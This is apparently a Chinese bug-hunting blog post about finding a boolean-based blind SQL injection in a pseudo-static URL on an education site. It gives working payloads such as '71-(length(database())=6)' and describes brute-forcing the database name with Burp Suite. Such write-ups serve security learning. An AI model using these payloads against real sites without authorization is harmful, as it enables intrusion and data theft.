漏洞挖掘 | 记一次伪静态页面的SQL注入

前言

最近工作繁忙,许久没有挖洞,打开度娘,凡事随缘,偶米头发~~(⊙﹏⊙)

涉及技能点

  • SQL注入基础原理

  • 盲注常用函数及思路

  • burpsuite基础知识

过程记录

1.发现

在翻阅一EDU站点时,发现路径中带有明显的数字参数

好像与我们平时习惯的xxx.php?id=不同呃

2.尝试注入

按照以往习惯,先用order by探探底,结果翻车了...应该有自定义逻辑在过滤敏感关键词。

继续努力,峰回路转,耶~~~!

构造boolen等式时能够被带入查询语句并显示不同效果

当条件不符合时,71-false=71,显示71.html,无数据

复制代码
http://EDU_SITE/.../..._id/71-false.html

=> SELECT ..FROM .. WHERE ... AND _id=71-false

而当条件符合时,71-true=70,显示70.html,有数据

复制代码
http://EDU_SITE/.../..._id/71-true.html

=> SELECT ..FROM .. WHERE ... AND _id=71-true

3.确定攻击方式,获取数据进行验证

获取用户名长度

复制代码
http://EDU_SITE/.../..._id/71-(length(user())=12).html

=> SELECT ..FROM .. WHERE ... AND _id=71-(length(user())=12)

获取数据库长度

复制代码
http://EDU_SITE/.../..._id/71-(length(database())=6).html

=> SELECT ..FROM .. WHERE ... AND _id=71-(length(database())=6)

尝试用burpsuite的clusterboom模式对database进行爆破

其中参数1 为位数,参数2 为可能出现的字符明文

获得最终database()=db_cms


3.总结

在尝试sql注入的时候,往往过分关注get传参或者post传参而忽略了URL中自带的注入点,有时候一些明显的数字型参数也能够带入payload

多尝试,多总结

祝各位师兄们也都收获满满~~!

更多网络安全优质学习资料与干货教程+

送渗透工具、技术文档、书籍,面试题、视频(基础到进阶。环境搭建,HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等)、应急响应笔记、学习路线。

申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法。

相关推荐
庸俗今天不摸鱼12 分钟前
【万字总结】前端全方位性能优化指南(十)——自适应优化系统、遗传算法调参、Service Worker智能降级方案
前端·性能优化·webassembly
xyliiiiiL14 分钟前
一文总结常见项目排查
java·服务器·数据库
shaoing16 分钟前
MySQL 错误 报错:Table ‘performance_schema.session_variables’ Doesn’t Exist
java·开发语言·数据库
用户62799471826217 分钟前
南大通用GBase 8s 获取表的约束与索引列信息
数据库
黄毛火烧雪下19 分钟前
React Context API 用于在组件树中共享全局状态
前端·javascript·react.js
曲江涛28 分钟前
微信小程序 webview 定位 并返回
微信小程序·小程序
Apifox29 分钟前
如何在 Apifox 中通过 CLI 运行包含云端数据库连接配置的测试场景
前端·后端·程序员
一张假钞32 分钟前
Firefox默认在新标签页打开收藏栏链接
前端·firefox
高达可以过山车不行32 分钟前
Firefox账号同步书签不一致(火狐浏览器书签同步不一致)
前端·firefox
m0_5937581033 分钟前
firefox 136.0.4版本离线安装MarkDown插件
前端·firefox